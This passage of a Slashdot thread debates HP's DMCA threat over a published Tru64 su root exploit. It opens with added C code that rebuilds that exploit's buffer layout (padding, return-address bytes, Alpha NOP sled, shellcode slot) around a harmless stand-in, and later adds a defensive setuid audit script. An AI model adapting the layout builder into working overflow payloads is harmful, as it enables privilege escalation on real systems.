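    Added example, not part of the posted su.c and not HP's or SnoSoft's code: the layout rules that exploit depends on, written as helpers a practitioner can check before launching anything. Both strings are delivered through execl() as C strings, so neither may contain an interior NUL, and on a fixed-width ISA like Alpha the sled and shellcode must be whole 4-byte instructions. The dimensions (8233 bytes of padding, 5 address bytes, a 15000-byte sled, a 116-byte shellcode) are taken from the posted code; the "shellcode" here is a constructed stand-in of NOPs that does nothing, the scratch buffers and function names are my own.

```c
#include <stddef.h>
#include <string.h>

/* Alpha NOP (bis $31,$31,$31) in little-endian byte order, the same word
 * the posted exploit uses for its sled. */
static const unsigned char ALPHA_NOP[4] = { 0x1f, 0x04, 0xff, 0x47 };

/* Scratch buffers with the posted exploit's dimensions (assumed). */
static unsigned char g_arg[8239];
static unsigned char g_payload[15200];

/* 1 if buf[0..len) contains no NUL byte. Both strings go through execl(),
 * which passes argv as C strings, so an interior 0x00 would cut the
 * payload short before the target ever sees it. */
int argv_clean(const unsigned char *buf, size_t len)
{
    return memchr(buf, 0, len) == NULL;
}

/* Repeat one instruction-sized NOP `count` times into dst.
 * Returns bytes written, or 0 if dst cannot hold the sled plus a NUL. */
size_t build_sled(unsigned char *dst, size_t cap,
                  const unsigned char *nop, size_t nop_len, size_t count)
{
    size_t total = nop_len * count;
    if (nop_len == 0 || count == 0 || total + 1 > cap)
        return 0;
    for (size_t i = 0; i < count; i++)
        memcpy(dst + i * nop_len, nop, nop_len);
    dst[total] = 0;
    return total;
}

/* Sled followed by shellcode, NUL-terminated: the exploit's argv[2].
 * Rejects a sled or shellcode that is not a whole number of nop_len-byte
 * instructions (execution could land mid-instruction on a fixed-width ISA)
 * and anything containing a NUL. Returns strlen() of the result, 0 on failure. */
size_t build_payload(unsigned char *dst, size_t cap, size_t sled_bytes,
                     const unsigned char *nop, size_t nop_len,
                     const unsigned char *sc, size_t sc_len)
{
    if (nop_len == 0 || sled_bytes % nop_len != 0 || sc_len % nop_len != 0)
        return 0;
    if (!argv_clean(nop, nop_len) || !argv_clean(sc, sc_len))
        return 0;
    if (sled_bytes + sc_len + 1 > cap)
        return 0;
    if (build_sled(dst, cap, nop, nop_len, sled_bytes / nop_len) != sled_bytes)
        return 0;
    memcpy(dst + sled_bytes, sc, sc_len);
    dst[sled_bytes + sc_len] = 0;
    return sled_bytes + sc_len;
}

/* Padding byte repeated pad_len times, then the bytes that land on the
 * saved address, NUL-terminated: the exploit's argv[1].
 * Returns strlen() of the result, 0 on failure. */
size_t build_overflow_arg(unsigned char *dst, size_t cap, size_t pad_len,
                          unsigned char pad, const unsigned char *tail,
                          size_t tail_len)
{
    if (pad == 0 || !argv_clean(tail, tail_len) || pad_len + tail_len + 1 > cap)
        return 0;
    memset(dst, pad, pad_len);
    memcpy(dst + pad_len, tail, tail_len);
    dst[pad_len + tail_len] = 0;
    return pad_len + tail_len;
}

/* Rebuild both argv strings with the posted dimensions. The "shellcode" is
 * a constructed stand-in of 29 NOP words (116 bytes, the posted code's size)
 * and does nothing. Returns 1 if both strings were built. */
int demo_build(size_t *arg_len, size_t *payload_len)
{
    static const unsigned char tail[5] = { 0x01, 0x04, 0x01, 0x40, 0x01 };
    unsigned char stub[116];
    for (int i = 0; i < 29; i++)
        memcpy(stub + 4 * i, ALPHA_NOP, 4);
    *arg_len = build_overflow_arg(g_arg, sizeof g_arg, 8233, 'A', tail, 5);
    *payload_len = build_payload(g_payload, sizeof g_payload, 15000,
                                 ALPHA_NOP, 4, stub, 116);
    return *arg_len != 0 && *payload_len != 0;
}
```

    With the posted dimensions demo_build() yields strlen values of 8238 and 15116, matching what the exploit's two printf() lines would report (8233 + 5, and 15000 + 116). The refusals are the useful part: a shellcode whose length is not a multiple of four, or any byte sequence with a NUL in it, is rejected before it is ever handed to execl().
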
  38. Re:let me see if I get this right by liquidsin · · Score: 2

    You're close, but I don't think you have it quite right. You're still thinking like the old america. In the old america, it could actually be a half a million dollar *lawsuit*. But nowadays, it's a half a million dollar *fine*. Copyright isn't a civil matter anymore. This is a felony, according to the new laws.

    --
    do not read this line twice.
  39. Security Issues by aebrain · · Score: 2

    It's worthwhile taking some lessons from history. Time was, there was a huge debate in the press - somewhat before George Washington - about whether Locksmiths should publish data about vulnerabilities of locks.

    The answer that was eventually arrived at was "Of course, because the professional crooks already know the vulnerabilities, and to publish would reveal to the customers what shoddy goods some locks were, and help improve the state of the art." (sorry, I've been unable to find some quotes on the web). The parallels are obvious.

    Another parallel : see the Associated Locksmiths of America's Code of Ethics.

    --
    Zoe Brain - Rocket Scientist
  40. What about the investors? by global_diffusion · · Score: 2

    But apache doesn't have to support as many investors as HP does. Think about the investors. If this bug were to be reported, these poor, defenseless investors would lose money. You don't want them to lose money, do you? That wouldn't be very nice of you.

    1. Re:What about the investors? by afidel · · Score: 2

      Actually, if they have had knowledge of a vulnerability for a year and been unable/unwilling to fix it and then pulled a stunt like this, then yes I DO want them to lose money, because rewarding bad companies with our investment dollars is one of the biggest problems with the economy today. Damn the numbers, product, customer or anything else as long as the stock price stays up!

      --
      There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order. Starting now.
    2. Re:What about the investors? by WNight · · Score: 2

      I know that's a joke, but... Yes, I do want investors to lose money. Too many people see their investments as something the government should protect. Sorry, invest in a company that's shady, lose money. Wah.

      Too much of the Microsoft anti-trust trial seemed to be based on what finding them guilty (and applying a real punishment) would do to their stock price. Not only did I not see any consideration for the stock prices of the companies MS destroyed through their illegal actions, but I also didn't see any concern for the law. It's like when an athlete breaks the law (rape, drugs, etc) and gets a slap on the wrist because they're famous and the team really needs them.

      Oh, and I wouldn't mind seeing some execs go to jail. I think Rambus's leaders need a little, for the fraud they committed. Real jail too, not play jail.

  41. Subtle attack on the DMCA? by aebrain · · Score: 3, Interesting

    Perhaps HP - having stopped Bruce Perens from protesting against the DMCA via civil disobedience - is attacking it via a reductio ad absurdum method. i.e. Showing exactly how it violates the principles of Free Speech. It's officially illegal to state that the Emperor has no clothes.

    --
    Zoe Brain - Rocket Scientist
  42. Dear Ms. Fiorina by Gerdts · · Score: 5, Interesting
    Posted at http://www.hp.com/hpinfo/execteam/email/fiorina/index.htm

    I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.

    The first issue is HP's request that Bruce Perens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.

    The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.

    Please reconsider your decision to use the Digital Millennium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.

    I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.

    1. Re:Dear Ms. Fiorina by zerocool^ · · Score: 2

      Dear Ms. Fiorina

      I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-hundred dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.

      --
      sig?
  43. We're the ones that need to make decisions by Inexile2002 · · Score: 2

    It just occurred to me thinking over this issue that HP and the other major corporations have made their positions plain - they have decided how they are going to deal with our ability to easily disseminate and copy information. The government has decided what it is going to do in regards to this issue - that is to side unilaterally with the corporations against its constituents.

    Interestingly, we've decided what we're going to do too. Anyone reading this post (trolls and whoever is pressing refresh in attempts to get fp excepted) has already pretty much decided about how they feel. Most /. readers to one degree or another favor the rights of the individual to express himself or herself, to share information and to act to actively uphold those ideals.

    And one of the brilliant things about /. is that it provides us with a forum to sound off and occasionally mobilize.

    What many of us (me included) need to do is really figure out exactly how we're going to react to all of this. Not just what I'm going to think, but what I'm going to actually do. This sort of thing threatens our personal freedoms, in some cases threatens our livelihood, threatens shared resources that we hold to be valuable etc...Cheering on the occasional script kiddie who DoS's a corporate server isn't enough.

    Not trying to start a revolution here, just trying to clarify my thinking in a public place...

  44. Why help those companies anyway? by g4dget · · Score: 2
    So, HP wants third parties to supply them with bug reports and fixes but not to have that information become public. So, basically, HP wants third parties to do their quality control and bug fixing for them for free, without even the scrutiny and quality control that goes along with an open process. And if you merely report publicly that there is a bug and want to get paid in order to fix it, you run the risk of getting accused of blackmail.

    I'd say: why help those companies in the first place? They charge an arm and a leg for their defective software, let them fix it themselves. If their software doesn't work as advertised, sue them if your contract permits it, or switch to something else. Don't waste your time and money on doing some vendor's quality control for them.

  45. I don't see the problem by tlambert · · Score: 2

    Unless they are doing it for the credits, there's no reason at all to not simply release the source code anonymously, without claiming any credit for it whatsoever.

    No credit -> No blame

    I can see HP's problem... the posting referred to the exploit as "warez", so it was a "r3534r(|-|3r" and not a "researcher" -- some kid working on his PhD -- who came up with the exploit, from all evidence. Being realistic, they *have* to bluster and otherwise overreact: they have a fiduciary responsibility for professional feather ruffling, given the apparent source of the exploit.

    Alternately, they could always *fix* the problem...

    -- Terry

    1. Re:I don't see the problem by fishbowl · · Score: 2

      "Being realistic, they *have* to bluster and otherwise overreact: they have a fiduciary responsibility for professional feather ruffling, given the apparent source of the exploit."

      That strategy could easily backfire, when the "kid" turns out to be a CS professor at Berlin or CERN. Or a US Defense agency. You get the idea. (Unfortunately, it NEVER works out to poetic justice like that.)

      --
      -fb Everything not expressly forbidden is now mandatory.
    2. Re:I don't see the problem by tlambert · · Score: 2

      CS professors rarely go by handles, such as "Phased", as in this case. I'm sure if it ever happened, they'd simply spin-doctor it, and be done with it, since it would lack utility as a means of brow-beating people.

      The purpose of the publication in this case was clearly a matter of "street cred" for the person publishing, and for the security consulting company that the person was trying to promote.

      Far be it for me to agree with Thomas C Greene of TheRegister, but it seems to me that there are a lot of people these days who publish exploits in the name of little known security consulting companies, in order to get contracts for those same companies, based on having established a reputation.

      The publication in this case has a purpose which is deeper than simply publishing information for the public good, which could have been achieved by publishing the same information anonymously.

      As a community, we do ourselves an incredible injustice by lining up to defend everyone who posts an exploit as if they were an associate professor at MIT. And that's exactly the perception that the initial commentary and posting to Slashdot of this article tried to imply.

      The only way to win the right for *everyone* to do this kind of research is to align yourself with researchers who are beyond reproach. The recent DeCSS decision against 2600, and its non-appeal of the decision were based on the fact that they were unsympathetic defendants. The only way to win is to ensure that the test cases are not all against unsympathetic defendants.

      -- Terry

    3. Re:I don't see the problem by richieb · · Score: 3, Insightful
      As a community, we do ourselves an incredible injustice by lining up to defend everyone who posts an exploit as if they were an associate professor at MIT. And that's exactly the perception that the initial commentary and posting to Slashdot of this article tried to imply.

      So free speech is good for academics, but not for a random hacker?

      What difference does it make who finds and reports a bug? The cool thing about the Internet is that you don't have to be a professor at MIT to publish security exploits. The publication speaks for itself.

      And if I'm running affected software, I don't care who reports the problem - as long as I find out and get a fix.

      Would you still feel the same if your bank kept your accounts on Tru64 HP machines?

      --
      ...richie - It is a good day to code.
  46. Re:DMCA Bad by ealar+dlanvuli · · Score: 2, Interesting

    s/decade/bicential/

    DMCA is about the cessation of the exchange of *PUBLIC IP* that happens to interact with private IP. The fact that it exists to destroy the "marketplace of ideas" that our country was partially founded on makes it reprehensible. The fact that it only affects a certain sector of this market is a nonissue, because the removal of any PUBLIC IP for the good of anything is "Un-American", and I'd even be so far-fetched as to say it's Un-Democratic.

    How? Follow this example; while it is the extreme, it clearly shows where we are today. A new law about computer security is being discussed in congress, and they bring in some experts to share the current state of exploits. The sharing of that specific knowledge in order to allow a more informed decision by the congress would in itself be illegal. Not because the information is under an acute monopoly, but because that information is illegal in this country. I repeat, that information (Remember, this information is PUBLIC IP) is *ILLEGAL IN THIS COUNTRY*.

    For another example. Imagine that a different law was under debate, a law that had some effect on "pirating" and "hacking", and this law required a complete review of the current laws in the area, and their usage. If this case goes to court, all of the records pertaining to the security vulnerability will be secured legally, not just under the DMCA anymore. Congress would be unable to discuss the specifics of this vulnerability, and make an informed decision about what new laws need to be passed.

    In both of these situations, information that is clearly PUBLIC IP has been removed from the reach of our lawmakers, causing them to make less than perfect decisions. This is clearly a hindrance on democracy, and obtains that status by disrupting the free trade of public information. This information was deemed unacceptable to exist, and therefore it became illegal to share it. No other possible subset of information not covered under contractual/patent law is so bound in our free country, which makes this the first time in 2 centuries that an idea was censored for being bad to a patent holder. (ed: sorry weak tie there, couldn't think of a better one)

    I believe I have upheld my value of the marketplace of ideas, and shown that by limiting democracy a free marketplace is unable to exist.

    --
    I live in a giant bucket.
  47. bite their own asses by austad · · Score: 2

    It's HP's own damn fault the flaw exists. And now they are trying to squash out legitimate publication of it. All they are doing is driving the exploit underground where only script kiddies will have access to it.

    If the security community doesn't know about the flaws (and workarounds to fix them), and the script kiddies do, they are biting their own asses because they are going to have a really shitty insecure product that is going to have a reputation for being hax0red.

    Yeah, the flaw was released without telling HP first, but who cares... HP needs to FIX THEIR SHIT and stop the bitching.

    --
    Need Free Juniper/NetScreen Support? JuniperForum
  48. Back to the script-kiddy days? by gotan · · Score: 2

    Apparently big corporations don't want flaws in their products exposed and prefer to use lawyers to "secure" their OS. So it's back to the days when exploits floated around in usenet-news (from untraceable sources) and a worm/virus had to bring down millions of systems before the software companies admit there is a security hole?

    And there I thought that those companies learned to value security over marketing issues. But obviously thinking farther into the future than 3 months is uncalled for these days. Business sense is dictated by the shareholders now, and the results are short-term tactics without overseeing the big picture (in this case that fixing security holes is more important in the long run, than sweeping them under the carpet).

    --
    "By the way if anyone here is in advertising or marketing... kill yourself." -- Bill Hicks
  49. Re:Dear HP (The Real Thing) by T3kno · · Score: 2

    To Whom It May Concern,

    Due to HP's recent abuse of the DMCA I have decided to never purchase an HP or Compaq product again. I am currently the IT manager of a consulting company, who shall remain nameless due to fear of litigation, and am in line to eventually become the CIO of this rapidly growing company. I have in the past been a supporter of HP products, especially your printers and UNIX servers, and Compaq products as well, and this decision has forced me to re-evaluate my commitment to HP. I recently purchased two HP LaserJet printers, one of them has been installed, but the other is still in the box and will be returned in exchange for a different manufacturer. I have a purchasing power of tens of thousands of dollars per year, that will be growing to hundreds of thousands in the future; as well as 95% of the say as to what my company purchases. I can wholeheartedly state that we will never purchase an HP or Compaq product again. I will also be encouraging my colleagues and personal friends to stay away from HP and Compaq products in the future as well. It is time for companies to learn that not only can their CEO's cheat their shareholders out of their retirements, but they cannot use litigation to solve the problems created by their inferior products and broken business models. Thank you for your time and consideration.

    Sincerely,

    P.S. Please feel free to email me with any questions or comments you might have regarding this note.

    --
    (B) + (D) + (B) + (D) = (K) + (&)
  50. Doubt that they would file suit. by www.sorehands.com · · Score: 2
    If they file a lawsuit, the lawsuit will be dismissed. That will cut down the size of the DMCA stick. If the case goes to appeal, it will lose thus cutting down the DMCA further.

    Why when Felten stood up, did they back away? They don't have an EVIL HACKER to vilify.

  51. real reason by norwoodites · · Score: 2

    The real reason, they are pissed is that they fired the Tru64 people already and HP does not want to make a patch for it. HP was pissed at OpenSSH when the vulnerability in it came out. They had to hire the people back to fix the problem, now they have to hire back again.

    1. Re:real reason by ZxCv · · Score: 2

      sources?

      --

      Perl - $Just @when->$you ${thought} s/yn/tax/ &couldn\'t %get $worse;
  52. Shit storm... by Psarchasm · · Score: 2

    I wonder if HP realizes the shitstorm it just released on itself, every other OS manufacturer out there, and every other company and individual that codes publicly released software.

    In the recent past the community itself made a reasonable effort to begin notifying developers that they had bugs in their code and give them a reasonable amount of time to fix said code and deploy patches before making the bugs public. It wasn't a perfect system and not everyone played by the "rules" but at least people seemed to want to behave responsibly.

    Now HP has thrown down the gauntlet, and given the one finger salute to every uber haxor, wannabe, script kiddie, grey hat, glam hungry geek on the planet.

    Gee the "New HP" sure is acting like some old ignorant twits. You cannot police what you cannot control. And as quickly as the "security community" tried to legitimize themselves - many of them can vanish right back under the limitless depths of the ether.

    Mmmmm peer to peer websurfing, mailing lists and newsgroups. Masked behind proxy after proxy. Hosted on a million webservers. *Homer Gurgle*

    --
    http://windows.scares.us
  53. Leave it to crackers by richieb · · Score: 5, Insightful
    Frankly, I think that all the security experts should stop looking at Tru64 and just publicize the fact that they don't recommend it for uses where security is required.

    Let the crackers have it.

    --
    ...richie - It is a good day to code.
    1. Re:Leave it to crackers by BlowCat · · Score: 2
      The alternative is chmod -s /usr/bin/su

      There are other ways to become root, e.g. ssh root@localhost with private key authentication.

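      As an added example, not part of BlowCat's post or of Tru64: a small POSIX shell script that checks for the setuid bit the post's `chmod -s /usr/bin/su` removes, applies that same workaround to any path, and lists every setuid file under a directory, so an administrator can see the workaround in the context of the other setuid binaries on the box (which, as the post notes, is not the only way to become root). The scratch directory and the fake `su`, `ping` and `ls` files it builds are constructed here; nothing touches real system binaries.

```sh
#!/bin/sh
# Added example, not from the original post. Checks and removes the setuid
# bit, and lists setuid files under a directory so the "chmod -s" workaround
# can be judged against every other setuid binary on the system.

# has_setuid PATH: succeed if the setuid bit is set on PATH (POSIX test -u).
has_setuid() {
    [ -u "$1" ]
}

# drop_setuid PATH: the workaround from the post, applied to any binary.
drop_setuid() {
    chmod u-s "$1"
}

# list_setuid DIR: print every regular file under DIR with the setuid bit.
# "-perm -4000" matches files that have at least the setuid bit set.
list_setuid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# count_setuid DIR: number of setuid files under DIR, as a plain integer.
count_setuid() {
    list_setuid "$1" | wc -l | tr -d ' '
}

# demo: build a constructed scratch tree (not real system binaries), then
# show the setuid inventory before and after applying the workaround to a
# fake "su".
demo() {
    dir=$(mktemp -d) || return 1
    mkdir "$dir/bin"
    : > "$dir/bin/su";   chmod 4755 "$dir/bin/su"    # setuid, like /usr/bin/su
    : > "$dir/bin/ping"; chmod 4755 "$dir/bin/ping"  # another setuid binary
    : > "$dir/bin/ls";   chmod 0755 "$dir/bin/ls"    # ordinary binary
    echo "setuid files before: $(count_setuid "$dir")"
    list_setuid "$dir"
    drop_setuid "$dir/bin/su"
    echo "setuid files after chmod u-s su: $(count_setuid "$dir")"
    list_setuid "$dir"
    rm -rf "$dir"
}

demo
```

      On a real host, `list_setuid /` (as root, so `find` can read every directory) gives the full inventory; the workaround only shrinks that list by one entry.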
    2. Re:Leave it to crackers by Fjord · · Score: 2

      Debian has an Alpha port and, while I don't know how complete the packages are, Debian tends to have above 90% of the packages as aptable binaries on each platform.

      --
      -no broken link
    3. Re:Leave it to crackers by richieb · · Score: 2
      Is Tru64 really that insecure compared with Solaris/HP-UX?

      [...]

      Do you have anything else to base your opinion on? I'm not flaming, I'm actually after a serious answer.

      I don't know if Tru64 is any more insecure than Solaris or Linux. However, the point is that if security experts who look for holes stop analyzing Tru64 as part of their work, Tru64 will become less secure. You know, fewer eyeballs find fewer bugs.

      Since HP wants to sue programmers who, without pay, find bugs in their code, why should the programmers be helping HP? Let HP suffer the consequences.

      Imagine if some car company XYZZY produced a car and they threatened to sue "Consumer Reports", if "Consumer Reports" released test results on this car. All "Consumer Reports" would have to say to avoid a suit is "we did not test this car from XYZZY, because they did not want us to". What would you think?

      Is this a serious enough answer?

      --
      ...richie - It is a good day to code.
  54. Watch the tickertape! by Black+Parrot · · Score: 2

    It might be interesting to watch HP's stock values, if word of this gets out before a patch does.

    --
    Sheesh, evil *and* a jerk. -- Jade
  55. The Hewlett Compaqard Way... by Lobsang · · Score: 2

    Yes... Things change... Now, it's called the Hewlett Compaqard way... and it will go downhill, sadly.

  56. Cluestick by the+eric+conspiracy · · Score: 2

    What is the difference between a private company and a public company?

    The public company sells stock on a public exchange. This makes it subject to certain financial disclosure requirements. A private company is generally owned by its principals who are also generally involved in the day to day management of the company. A private company does not have to make significant financial disclosures to the public or its employees.

    In both cases the goal of the company is to make money for its owners/investors.

    In most cases the ultimate goal for a private company is to 'flip', or go public, cashing out the owners. The process of flipping is carefully engineered to present an appearance of great value where in fact there may be none.

    NONE of this has anything to do with customer satisfaction other than that needed for commercial operations.

    1. Re:Cluestick by Glytch · · Score: 2

      You've just answered your own question, even though you haven't thought things out to their logical conclusion. A private company tends to have an owner/owners who understand (well, more than a shareholder, anyway) how things are actually going in the company. The managers don't have the ownership screaming at them to cut costs (such as customer tech support, employee benefits, etc) every time the NASDAQ drops a hundredth of a percent. I've worked in both kinds of companies, and I kept my eyes open.

    2. Re:Cluestick by nathanm · · Score: 2
      In most cases the ultimate goal for a private company is to 'flip', or go public, cashing out the owners. The process of flipping is carefully engineered to present an appearance of great value where in fact there may be none.
      Not in most cases. There are many times more private, small businesses than publicly traded ones.

      Also, flipping is a relatively recent phenomenon; mostly a product of the late 90s technology boom.
    3. Re:Cluestick by Lemmy+Caution · · Score: 2

      Almost correct. The purpose of a privately held company is whatever the owners want it to do. If they want to break even and spend any profits on funny hats for the sales team, that's what it's for. If they want to fill their factory with toy mice and start singing in Dutch, as long as they can afford to, then that's what they're for. In fact, many privately held companies - like Hershey, for example - have charters which make profit a secondary motive to some other, social cause (in the case of Hershey, it's supporting education).

    4. Re:Cluestick by gorilla · · Score: 2
      In both cases the goal of the company is to make money for its owners/investors.

      Not necessarily. The goal of the company is to act in the way that its owners/investors want. In many cases that means making money, but for many others that means making no money at all. Good examples are many hospitals.

  57. There is a lesson to be learned here by Bob+Loblaw · · Score: 2, Insightful
    Companies that deal with hardware are supportive of the DMCA (makers of DVD drives, CPUs, satellite broadcasters, etc.). The reason being that it is *very* expensive for them to fix a security problem once the hardware is being sold out in the field. It involves costly recalls, shipping and reassembly. Sometimes a "fix" can be handled in firmware but not always.

    Companies that deal with software are less supportive of the DMCA. If they have a bug in their software, they whip out a patch, put it on their webpage and tell people to install it themselves. They have little to lose if someone hacks around their software since they can more cheaply play a game of cat and mouse with the hackers with the full source code at their disposal where the hacker has none of the proprietary code.

    1. Re:There is a lesson to be learned here by NullProg · · Score: 2, Insightful

      In both of your lessons, it all boils down to design. Can you, as a designer, imagine all the flaws in your design? :)

      Enjoy.

      --
      It's just the normal noises in here.
  58. My mail to Carly by CrayDrygu · · Score: 4, Interesting

    Mrs Fiorina,

    I work for a retailer -- Best Buy -- which sells a large volume of HP and Compaq products. I have long been a fan of Hewlett Packard, but some recent news is troubling me.

    Kent Ferson's reaction to Phased's posting of the security vulnerability in Tru64 was nothing short of shockingly irresponsible.

    Not only am I disturbed that there was no statement of any intent to fix the security hole, but I am shocked at the threat of a lawsuit under the DMCA. You should be grateful that the hole was brought to your attention before it became a widespread problem, not to mention that had you fixed it in a timely manner (as the hole was revealed to you by SnoSoft last year), this would never have been a problem.

    This reaction tells me that not only is HP/Compaq concerned more with their image than with ensuring the quality of their products, but that "The New HP" would rather abuse copyright law by "shooting the messenger" than issue a responsible statement, and repair an error before it becomes a problem.

    I'll be waiting in the next few days for a press release or some other statement denouncing Mr. Ferson's actions, and showing that HP has plans to repair the hole in Tru64. Until this happens, I'm not sure I'll be able to recommend that anyone give their money to Hewlett Packard.

    Looking forward to your response.

    [Name Removed]

    --
    "I personal[ly] think Unix is "superior" because on LSD it tastes like Blue." -- jbarnett

    1. Re:My mail to Carly by JohnA · · Score: 4, Insightful
      Wow... you work for a company that HAS ITS OWN CUSTOMERS ARRESTED and you have the nerve to complain about HP's DMCA threat?

      Talk about the pot calling the kettle black...

    2. Re:My mail to Carly by Arcturax · · Score: 2

      I don't see why you should blame the guy on the sales floor for that! It is the management of Best Buy who is at fault, not the individual employees, many of whom were likely upset at this as well.

      --

      --Won't that be grand? Computers and the programs will start thinking and the people will stop. - Dr. Walter Gibbs
    3. Re:My mail to Carly by zerocool^ · · Score: 2

      On the other hand, it's perfectly reasonable to want to have a job. In this world, how many places could you possibly work where you completely agree with the ethics and motivations of any management team?

      Food, clothing, and shelter come first. Ethics, beliefs, and protests come second. Call me weak willed, but I would be unwilling to walk out of a job because I didn't agree with the management if it was going to leave my life / family in limbo. A lot of people on slashdot like to nay-say these things, but how many would *really* be able to walk out on a salary to prove a point? When it comes to put up or shut up, I'll shut up and take my paycheck, thank you.

      ~Will

      --
      sig?
    4. Re:My mail to Carly by CrayDrygu · · Score: 2
      "Wow... you work for a company that HAS ITS OWN CUSTOMERS ARRESTED"

      No... I don't. Those actions were the decision of management at that particular location, and in no way reflect any kind of company policy.

      In fact, a couple kids came into my store a couple weeks ago looking for a GF4 for $129, and after a brief chat with a manager, they got it.

      --
      "I personal[ly] think Unix is "superior" because on LSD it tastes like Blue." -- jbarnett

  59. Re:Why is this bad? by akb · · Score: 2

    Actually you didn't read closely at all. If you had you would have discovered that this hole has been known for a year.

  60. Re:Don't blame HP by Gorimek · · Score: 2

    I didn't say the law should be used to quash legitimate research, only that it will have that effect, as long as it's on the books.

    Carly may or may not fire the VP. Either way it will have no effect whatsoever on the real problem, the DMCA.

  61. This could turn out to be good... by GuNgA-DiN · · Score: 2, Insightful

    If companies start to make it a habit of suing people who tell the truth about them people will stop trusting these companies. Why did they tell HP about it first? They were honest and got bitch slapped. So, next time the researchers will think twice before going to the company. Maybe they will just publish on FreeNet or leak their story on Slashdot first?

  62. This is a marketing disaster for HP. by Futurepower(R) · · Score: 5, Interesting

    Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.

    This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irreparable damage to HP.

    We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?

    It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.

    1. Re:This is a marketing disaster for HP. by Bruce+Perens · · Score: 5, Interesting
      Let's not get draconian yet, it could be correcting a wrong with another wrong. Maybe an apology is what is necessary, and perhaps that would teach a better lesson to all involved. But I can't say what is necessary until I see full data. All I have tonight are news reports.

      Bruce

    2. Re:This is a marketing disaster for HP. by Baki · · Score: 2

      Indeed it is (a marketing disaster). I have written them a letter vowing to never buy HP products again (which I have a lot in the past) if this story is true.

      Yes, essentially it is the law that is wrong, but in this case it shows a company not fixing a problem they have, but instead shooting the messenger. For me from a customer perspective, that is a very very bad sign (not to mention it is immoral). Grrrr

    3. Re:This is a marketing disaster for HP. by Neil+Watson · · Score: 3, Insightful
      Let's not get draconian yet,

      I'm going to wander slightly off topic here but I feel what you are saying is wrong. Today, top company executives seem to be above the law. They can operate their companies however they choose. No one ever seems to hold them accountable. A company goes bankrupt, thousands lose their jobs and top executives are laughing all the way to the bank. In this example an executive acts in an irresponsible manner that could affect many of his customers, and you suggest merely a wrist slap?

    4. Re:This is a marketing disaster for HP. by HiThere · · Score: 2

      Umnh... I suppose that it is conceivable that there might possibly be some vaguely plausible reason for issuing that letter.

      I don't like it. I don't like any company that such a letter would come from. I can't imagine feeling that anyone who would write such a letter deserves any courtesy. Or civility. To my mind he has declared himself an enemy of humanity, were I of a theistic bent I would say an enemy of God, as that is what I really feel.

      I can imagine tactical, and possibly even strategic, reasons to not do anything immediately. Believing in them is a lot more difficult.

      --

      I think we've pushed this "anyone can grow up to be president" thing too far.
    5. Re:This is a marketing disaster for HP. by Reziac · · Score: 2

      Rule #1 when firing someone: make sure you already *know* who you plan to replace them with, AND that the replacement is more competent than the guy you fired. Because otherwise, you may find that whoever replaces 'em is WORSE.

      BTW this applies when getting rid of *anything* that once done away with, must be replaced.

      --
      ~REZ~ #43301. Who'd fake being me anyway?
  63. A Scenario... by pla · · Score: 2, Insightful

    Imagine...

    You have a brand-new deadbolt lock installed on your front door.

    A month later, a master key for your lock's exact model leaks out.

    Every thief within a hundred miles has a key to your front door, they just have to notice that it fits to rob you blind.

    Fortunately, a neighborhood watch group got wind of the leaked key, and started publicising it heavily, saving countless people from break-ins.

    So who does the lock manufacturer go after, on learning of this problem?

    Not the engineer who stupidly designed a master-keyed lock for the general public...

    Not the thieves who make use of this information...

    Not even the problem itself, which would take only a limited recall and almost no effort to correct...

    Instead, they go after the neighborhood watch group, on some shaky grounds about loss of confidence in the company.

    It strikes me as a *DAMNED* good thing that we only have such f'd up laws relating to computers, rather than physical security. Oh, wait, one *could* read the DMCA as applying to physical security. Oops. Time to go install a 2x4 on a latch-and-hinge across my front door.

  64. I'd wear that by fobbman · · Score: 2

    Anyone know if this exploit would fit on a t-shirt?

    1. Re:I'd wear that by fobbman · · Score: 2

      Looks like it will!

      I would post the program but apparently I'm supposed to use fewer 'junk' characters, even when posting as code. Honestly, I think that this program is much more than 'junk characters'.

  65. Honorable Bruce Perens by jsse · · Score: 4, Informative

    Just in case a few of us here don't know about him. You can find his homepage here, and in his bio you can find:

    " Hewlett-Packard Corporation - 2000 to Present

    Senior strategist, Linux and Open Source. I am the first Open Source evangelist to gain a role in top management of a multi-Billion-dollar corporation. On the org chart there are only three people between me and the CEO - a general manager, a vice president, and a president. Among my assignments is to challenge HP management."

    So he's in position to speak up in this case.

    Note: I don't know if it's redundant but I'm sure some people would like to know. I don't ask for any mod points.

